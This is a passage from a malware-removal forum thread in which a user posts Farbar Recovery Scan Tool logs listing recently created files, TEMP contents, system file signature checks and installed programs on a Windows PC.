2014-12-17 02:01 - 2014-12-25 05:21 - 00000000 ____D () C:\Users\April\Desktop\LINKS TO LOOK AT
2014-12-16 15:02 - 2014-12-16 15:02 - 00000214 _____ () C:\Users\April\Desktop\(99) Lo Mas Loco Del Face.url
2014-12-16 14:59 - 2014-12-16 14:59 - 00000000 ____D () C:\Users\April\AppData\Local\{D0D21C11-1C78-4162-B1CB-4A1D70A76190}
2014-12-16 02:34 - 2014-12-16 02:34 - 00000237 _____ () C:\Users\April\Desktop\The Holy Spirit.url
2014-12-15 16:53 - 2014-12-15 16:53 - 00000000 ____D () C:\Users\April\AppData\Local\{647BFC14-DC17-4844-9C09-A2A406B3130E}
2014-12-15 05:29 - 2014-12-15 05:29 - 00000164 _____ () C:\Users\April\Desktop\CPSC Home  CPSC.gov.url
2014-12-14 00:49 - 2014-12-14 00:49 - 00000000 ____D () C:\Users\April\AppData\Local\{946D5A84-1501-49EC-8BDC-0509BE21CE08}
2014-12-12 14:00 - 2014-12-12 14:01 - 00000000 ____D () C:\Users\April\AppData\Local\{25A62D4B-AC03-4E0D-B94E-39D01FB39AC7}
2014-12-12 02:22 - 2014-12-12 02:22 - 00000360 _____ () C:\Users\April\Desktop\Easy Gift Ideas Cookies in a Jar – P&G everyday  Home-Garden  P&G Everyday.url
2014-12-11 12:31 - 2014-12-11 12:31 - 00000000 ____D () C:\Users\April\AppData\Local\{FEA54AFB-113D-440C-BC64-16BE7AD78633}
2014-12-10 17:25 - 2014-12-10 17:25 - 00000000 ____D () C:\Users\April\AppData\Local\{BF7F7441-12C0-4EC8-AB3C-F0EAB442FF55}
2014-12-10 05:30 - 2014-12-10 05:32 - 00000000 ____D () C:\Users\April\Desktop\1039 older
2014-12-10 04:11 - 2014-12-10 04:11 - 00000000 ____D () C:\windows\system32\appraiser
2014-12-10 03:54 - 2014-10-17 20:33 - 03209728 _____ (Microsoft Corporation) C:\windows\system32\mf.dll
2014-12-10 03:54 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\windows\system32\mfps.dll
2014-12-10 03:54 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\windows\system32\rrinstaller.exe
2014-12-10 03:54 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\windows\system32\mfpmp.exe
2014-12-10 03:54 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\windows\system32\mferror.dll
2014-12-09 18:51 - 2014-12-03 23:38 - 00728576 _____ (Microsoft Corporation) C:\windows\system32\appraiser.dll
2014-12-09 18:51 - 2014-12-03 23:38 - 00610304 _____ (Microsoft Corporation) C:\windows\system32\invagent.dll
2014-12-09 18:51 - 2014-12-03 23:38 - 00159744 _____ (Microsoft Corporation) C:\windows\system32\aepic.dll
2014-12-09 18:51 - 2014-12-03 23:34 - 00873984 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-12-09 18:51 - 2014-12-01 18:28 - 01160872 _____ (Microsoft Corporation) C:\windows\system32\aitstatic.exe
2014-12-09 18:51 - 2014-11-10 21:44 - 01230336 _____ (Microsoft Corporation) C:\windows\system32\WindowsCodecs.dll
2014-12-09 18:51 - 2014-11-10 20:32 - 00074752 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tdx.sys
2014-12-09 18:50 - 2014-12-03 23:38 - 00337920 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll
2014-12-09 18:50 - 2014-12-03 23:38 - 00315392 _____ (Microsoft Corporation) C:\windows\system32\devinv.dll
2014-12-09 18:50 - 2014-12-03 23:38 - 00202752 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-12-09 18:50 - 2014-11-26 20:10 - 00342200 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-12-09 18:50 - 2014-11-21 21:22 - 19749376 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-12-09 18:50 - 2014-11-21 21:20 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-12-09 18:50 - 2014-11-21 21:20 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2014-12-09 18:50 - 2014-11-21 21:07 - 00501248 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-12-09 18:50 - 2014-11-21 21:07 - 00062464 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-12-09 18:50 - 2014-11-21 21:06 - 00047616 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-12-09 18:50 - 2014-11-21 21:05 - 00064000 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-12-09 18:50 - 2014-11-21 21:01 - 02277888 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-12-09 18:50 - 2014-11-21 20:59 - 00047104 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-12-09 18:50 - 2014-11-21 20:58 - 00030720 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-12-09 18:50 - 2014-11-21 20:56 - 00478208 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-12-09 18:50 - 2014-11-21 20:55 - 00102912 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-12-09 18:50 - 2014-11-21 20:54 - 00620032 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-12-09 18:50 - 2014-11-21 20:48 - 00667648 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-12-09 18:50 - 2014-11-21 20:45 - 00418304 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-12-09 18:50 - 2014-11-21 20:40 - 00060416 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-12-09 18:50 - 2014-11-21 20:36 - 00168960 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-12-09 18:50 - 2014-11-21 20:35 - 00076288 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-12-09 18:50 - 2014-11-21 20:33 - 00285696 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-12-09 18:50 - 2014-11-21 20:29 - 04299264 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-12-09 18:50 - 2014-11-21 20:23 - 00688640 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-12-09 18:50 - 2014-11-21 20:23 - 00684544 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-12-09 18:50 - 2014-11-21 20:22 - 02052096 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-12-09 18:50 - 2014-11-21 20:21 - 01155072 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-12-09 18:50 - 2014-11-21 20:13 - 12836864 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-12-09 18:50 - 2014-11-21 20:00 - 01888256 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-12-09 18:50 - 2014-11-21 19:56 - 01307136 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-12-09 18:50 - 2014-11-21 19:54 - 00710144 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-12-09 18:49 - 2014-11-07 21:45 - 00002048 _____ (Microsoft Corporation) C:\windows\system32\tzres.dll
2014-12-09 18:48 - 2014-10-29 20:45 - 00155136 _____ (Microsoft Corporation) C:\windows\system32\charmap.exe
2014-12-09 18:48 - 2014-10-02 20:45 - 01177088 _____ (Microsoft Corporation) C:\windows\system32\WsmSvc.dll
2014-12-09 18:48 - 2014-10-02 20:45 - 00248832 _____ (Microsoft Corporation) C:\windows\system32\WSManMigrationPlugin.dll
2014-12-09 18:48 - 2014-10-02 20:45 - 00214016 _____ (Microsoft Corporation) C:\windows\system32\WsmWmiPl.dll
2014-12-09 18:48 - 2014-10-02 20:45 - 00145920 _____ (Microsoft Corporation) C:\windows\system32\WsmAuto.dll
2014-12-09 18:48 - 2014-10-02 20:44 - 00198656 _____ (Microsoft Corporation) C:\windows\system32\WSManHTTPConfig.exe
2014-12-09 15:15 - 2014-12-09 15:15 - 00000000 ____D () C:\Users\April\AppData\Local\{10475705-A45B-4B35-81F3-CEE339A624E0}
2014-12-09 03:14 - 2014-12-09 03:14 - 00000000 ____D () C:\Users\April\AppData\Local\{B53A6077-2E7E-4B78-AA25-AA21CDAB0E76}
2014-12-08 15:14 - 2014-12-08 15:14 - 00000000 ____D () C:\Users\April\AppData\Local\{9D754292-E5DC-4308-A21C-790EDE7112BB}
2014-12-08 02:21 - 2014-12-08 02:21 - 00000000 ____D () C:\Users\April\AppData\Local\{56615F81-04A8-4978-B35D-5C86FDD929EE}
2014-12-06 19:22 - 2014-12-06 19:23 - 00000000 ____D () C:\Users\April\AppData\Local\{4D4E8600-1847-4574-B96C-DE0AD2421513}
2014-12-04 14:43 - 2014-12-04 14:43 - 00000000 ____D () C:\Users\April\AppData\Local\{4B1F3E40-071E-4ABC-A37C-9CBC3F6F093B}
2014-12-03 23:17 - 2014-12-03 23:17 - 00000205 _____ () C:\Users\April\Desktop\nomorerack.com.url
2014-12-03 17:51 - 2014-12-03 17:51 - 00000000 ____D () C:\Users\April\AppData\Local\{02E177BB-8047-4B59-9353-A6038F4D7613}
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-01-01 23:43 - 2010-03-16 21:48 - 00000886 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-01-01 23:38 - 2012-03-28 04:29 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2015-01-01 18:58 - 2009-10-27 08:25 - 02082610 _____ () C:\windows\WindowsUpdate.log
2015-01-01 13:43 - 2010-03-16 21:48 - 00000882 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-01-01 12:31 - 2009-07-13 23:34 - 00018736 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-01 12:31 - 2009-07-13 23:34 - 00018736 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-01 12:26 - 2013-03-28 19:18 - 00000000 ____D () C:\ProgramData\Kodak
2015-01-01 12:24 - 2012-02-22 02:58 - 00000000 ____D () C:\Temp
2015-01-01 12:23 - 2009-07-13 23:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2015-01-01 12:23 - 2009-07-13 23:39 - 00163575 _____ () C:\windows\setupact.log
2015-01-01 02:39 - 2014-07-12 14:32 - 00114904 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2015-01-01 01:07 - 2009-09-03 20:09 - 00782510 _____ () C:\windows\system32\PerfStringBackup.INI
2015-01-01 00:21 - 2009-09-03 20:31 - 00950374 _____ () C:\windows\PFRO.log
2015-01-01 00:17 - 2009-11-27 22:21 - 00000000 ____D () C:\Users\April
2014-12-31 20:29 - 2011-10-14 19:25 - 00000000 ____D () C:\AmericasCardroom
2014-12-31 18:45 - 2014-03-10 16:28 - 00000000 ____D () C:\Users\April\Desktop\POSTPICSFORFB
2014-12-25 05:21 - 2014-03-28 17:11 - 00000000 ____D () C:\Users\April\Desktop\SALE
2014-12-21 23:26 - 2009-12-02 02:04 - 00000000 ____D () C:\Users\April\Desktop\POKER
2014-12-20 22:27 - 2013-03-28 19:31 - 00098038 _____ () C:\Users\April\AppData\Local\installer.log
2014-12-17 09:39 - 2014-07-12 14:31 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-12-17 02:07 - 2014-07-12 14:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-17 02:07 - 2012-04-09 19:35 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-16 15:56 - 2014-10-16 00:22 - 00000000 ____D () C:\Users\April\Desktop\ALL FROM THIS SIDE
2014-12-14 00:44 - 2009-09-03 20:23 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-12-13 23:22 - 2010-06-04 05:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-12-12 10:48 - 2014-08-13 21:05 - 00000000 ____D () C:\Users\April\AppData\Local\Adobe
2014-12-12 10:47 - 2012-03-28 04:29 - 00701616 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerApp.exe
2014-12-12 10:47 - 2011-05-16 16:03 - 00071344 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerCPLApp.cpl
2014-12-11 10:44 - 2011-05-14 02:27 - 00000000 ____D () C:\Program Files\PhotoFiltre
2014-12-11 03:12 - 2014-11-06 13:35 - 00000000 ____D () C:\Users\April\Desktop\CAR
2014-12-10 04:11 - 2014-05-06 19:37 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-12-10 04:11 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\AppCompat
2014-12-10 03:55 - 2009-10-27 08:37 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-12-10 03:51 - 2013-07-12 02:52 - 00000000 ____D () C:\windows\system32\MRT
2014-12-10 03:43 - 2009-11-28 03:52 - 109818608 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-12-04 04:01 - 2013-07-06 17:50 - 00000000 ____D () C:\Users\April\Desktop\HOUSES UPDATE
 
Some content of TEMP:
====================
C:\Users\April\AppData\Local\Temp\6_Offer_15.exe
C:\Users\April\AppData\Local\Temp\Full Flush Poker Updater.exe
C:\Users\April\AppData\Local\Temp\javasysmo1207358081345394113.dll
C:\Users\April\AppData\Local\Temp\javasysmo1628807590474577829.dll
C:\Users\April\AppData\Local\Temp\javasysmo1761121707812716792.dll
C:\Users\April\AppData\Local\Temp\javasysmo2223852071502545994.dll
C:\Users\April\AppData\Local\Temp\javasysmo2315818779424484969.dll
C:\Users\April\AppData\Local\Temp\javasysmo3304135815127925035.dll
C:\Users\April\AppData\Local\Temp\javasysmo3820161635983422442.dll
C:\Users\April\AppData\Local\Temp\javasysmo4822824344328773452.dll
C:\Users\April\AppData\Local\Temp\javasysmo484916868635085645.dll
C:\Users\April\AppData\Local\Temp\javasysmo5423105724221550140.dll
C:\Users\April\AppData\Local\Temp\javasysmo5749812398928454079.dll
C:\Users\April\AppData\Local\Temp\javasysmo6698478116327770814.dll
C:\Users\April\AppData\Local\Temp\javasysmo785673170964680476.dll
C:\Users\April\AppData\Local\Temp\javasysmo7900495085469822409.dll
C:\Users\April\AppData\Local\Temp\javasysmo805063298581186682.dll
C:\Users\April\AppData\Local\Temp\javasysmo809951356480511583.dll
C:\Users\April\AppData\Local\Temp\javasysmo8229446883317656224.dll
C:\Users\April\AppData\Local\Temp\javasysmo8437360746432048315.dll
C:\Users\April\AppData\Local\Temp\javasysmo9178761539779851487.dll
C:\Users\April\AppData\Local\Temp\javasysmo940975743016470114.dll
C:\Users\April\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\April\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe
C:\Users\April\AppData\Local\Temp\kwbxo1eg.dll
C:\Users\April\AppData\Local\Temp\MotoHelper_2.0.51_Driver_5.2.0.exe
C:\Users\April\AppData\Local\Temp\Quarantine.exe
C:\Users\April\AppData\Local\Temp\sqlite3.dll
C:\Users\April\AppData\Local\Temp\v2ote5em.dll
C:\Users\April\AppData\Local\Temp\_unps.exe
C:\Users\April\AppData\Local\Temp\{A9D35BAE-EED3-4C13-ADE2-D45D35377C07}-chrome_updater.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-28 15:23
 
==================== End Of Log ============================


#12
JUSTME1969

    Member

  • Topic Starter
  • Member
  • 32 posts

Addition txt 

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 01-01-2015
Ran by April at 2015-01-02 00:15:36
Running from C:\Users\April\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Aced.com (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\Aced.com) (Version: 6.0 - )
Adobe AIR (HKLM\...\Adobe AIR) (Version: 14.0.0.178 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.246 - Adobe Systems Incorporated)
Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.235 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM\...\Adobe Shockwave Player) (Version: 11.6.3.633 - Adobe Systems, Inc.)
aioscnnr (Version: 5.8.10.0 - Your Company Name) Hidden
aioscnnr (Version: 7.6.13.10 - Your Company Name) Hidden
AmericasCardroom (HKLM\...\296836EA-EF3A-4C36-8C13-3A6C1DB2D4BE) (Version: 16.0 - IGSoft)
Apple Application Support (HKLM\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{E14ADE0E-75F3-4A46-87E5-26692DD626EC}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Attack Poker 1.0.1.266 (HKLM\...\Attack Poker_is1) (Version:  - )
Avast Free Antivirus (HKLM\...\avast) (Version: 10.0.2208 - AVAST Software)
BetOnline Poker 8.2 (HKLM\...\BetOnline Poker 8.2) (Version: 8.2.12.201404151600 - Hero Poker Network)
BlackChipPoker (HKLM\...\FE4D6F94-B3D5-484b-94F7-8BC45DEB7A82) (Version: 16.6 - IGSoft)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
BovadaPoker (HKLM\...\{D7CA2DF8-95CE-4C80-9296-98E21219A1E5}}_is1) (Version:   - )
C4USelfUpdater (Version: 1.00.0000 - Your Company Name) Hidden
CarbonPoker (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\CarbonPoker) (Version: 5.0 - )
center (Version: 7.8.0.0 - Eastman Kodak Company) Hidden
Colt Poker (HKLM\...\Colt Poker) (Version: 2.0.1.4006 - Colt Poker) <==== ATTENTION!
Comcast Desktop Software (v1.2.0.9) (HKLM\...\{CEF7211D-CE3A-44C4-B321-D84A2099AE94}) (Version: 23 - Comcast)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
ESPN Version 2.0.7.21 (HKLM\...\ESPN_is1) (Version:  - ESPN)
essentials (Version: 7.8.0.0 - Eastman Kodak Company) Hidden
Full Flush Poker 8.2 (HKLM\...\Full Flush Poker 8.2) (Version: 8.2.12.201310281100 - Full Flush Poker)
Gadwin PrintScreen (HKLM\...\Gadwin PrintScreen) (Version: 4.6 - Gadwin Systems, Inc.)
Google Chrome (HKLM\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
GridPoker (HKLM\...\{516D6624-97F2-4F28-8FFA-8D157D9BBD4F}) (Version: 1.1.0238 - Fastgrid Ltd)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1883 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Intertops Poker (HKLM\...\Intertops Poker) (Version:  - )
iTunes (HKLM\...\{11E568E0-3244-4BCB-875E-F334269DFDCB}) (Version: 11.0.3.42 - Apple Inc.)
Java 7 Update 67 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217067FF}) (Version: 7.0.670 - Oracle)
Java 8 Update 25 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kodak AIO Printer (Version: 7.8.1.0 - Eastman Kodak Company) Hidden
KODAK AiO Software (HKLM\...\{E0F274B7-592B-4669-8FB8-8D9825A09858}) (Version: 7.8.5.2 - Eastman Kodak Company)
[email protected] 1.0 (HKLM\...\{0D795777-9D60-4692-8386-F2B3F2B5E5BF}) (Version: 1.0 - Corel)
Lock Poker (HKLM\...\Lock Poker) (Version: 1.0.11423 - LockPoker)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.31211.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (HKLM\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MotoHelper 2.1.32 Driver 5.4.0 (HKLM\...\MotoHelper) (Version: 2.1.32 - Motorola)
MotoHelper MergeModules (Version: 1.2.0 - Motorola) Hidden
MOTOROLA MEDIA LINK (HKLM\...\{378397D6-FD32-4092-A854-6A75CB7EDA46}) (Version: 1.5.4090.2 - Motorola)
Motorola Mobile Drivers Installation 5.4.0 (Version: 5.4.0 - Motorola Inc.) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Music Oasis (HKLM\...\{c6c214df-2922-4809-94aa-f4d67d4451ec}) (Version: 1.0.0 - W3i, LLC)
MyToshiba (HKLM\...\{01250B8F-D947-4F8A-9408-FE8E3EE2EC92}) (Version: 2.2.0.3 - Toshiba)
NetZero Launcher (HKLM\...\{9AEAF9CC-390B-49C0-8F7F-14092BF163B6}) (Version: 2.01 - TOSHIBA Corporation)
NLOP (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\NLOP) (Version:  - Power Play Development)
NoPayPOKER (HKLM\...\NoPayPOKER_is1) (Version:  - )
ocr (Version: 6.2.3.50 - Eastman Kodak Company) Hidden
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
PhotoFiltre (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\PhotoFiltre) (Version:  - )
PlayReady PC Runtime x86 (HKLM\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Poker Host (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\Poker Host) (Version: 5.0 - )
Poker Rebel 1.0 (HKLM\...\{7DB4BC53-AD0C-485F-8D5B-D98B01AC9A2A}_is1) (Version: 1.0 - Entertain ME LLC)
PokerStars.net (HKLM\...\PokerStars.net) (Version:  - PokerStars.net)
PreReq (Version: 6.2.4.0 - Eastman Kodak Company) Hidden
PrintProjects (HKLM\...\PrintProjects) (Version: 1.0.0.9282 - RocketLife Inc.)
Quickbooks Financial Center (HKLM\...\{3B843B38-04B1-4CE6-8888-586273E0F289}) (Version: 2.02 - TOSHIBA Corporation)
QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Realtek Ethernet Controller  Driver (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0008 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5904 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30101 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM\...\{0FB630AB-7BD8-40AE-B223-60397D57C3C9}) (Version: 2.00.0006 - Realtek)
Sandboxie 3.54 (32-bit) (HKLM\...\Sandboxie) (Version:  - )
Sharks Den Poker (HKLM\...\com.teamodc.sharksdenpoker.E54FAB7AFFA7DC546BACB249B6BFF74B58FC797F.1) (Version: 1.2.404 - UNKNOWN)
Sharks Den Poker (Version: 1.2.404 - UNKNOWN) Hidden
Skype Click to Call (HKLM\...\{B6CF2967-C81E-40C0-9815-C05774FEF120}) (Version: 6.6.11664 - Skype Technologies S.A.)
Skype Launcher (HKLM\...\{DA84ECBF-4B79-47F2-B34C-95C38484C058}) (Version: 2.01 - TOSHIBA Corporation)
Skype™ 6.11 (HKLM\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 13.2.6.1 - Synaptics Incorporated)
TeamSpeak 3 Client (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\TeamSpeak 3 Client) (Version: 3.0.15 - TeamSpeak Systems GmbH)
Toshiba Application and Driver Installer (HKLM\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.0.9 - Toshiba)
TOSHIBA Assist (HKLM\...\{12B3A009-A080-4619-9A2A-C6DB151D8D67}) (Version: 2.01.11 - TOSHIBA)
TOSHIBA ConfigFree (HKLM\...\{F3529665-D75E-4D6D-98F0-745C78C68E9B}) (Version: 8.0.21 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.1 - TOSHIBA Corporation)
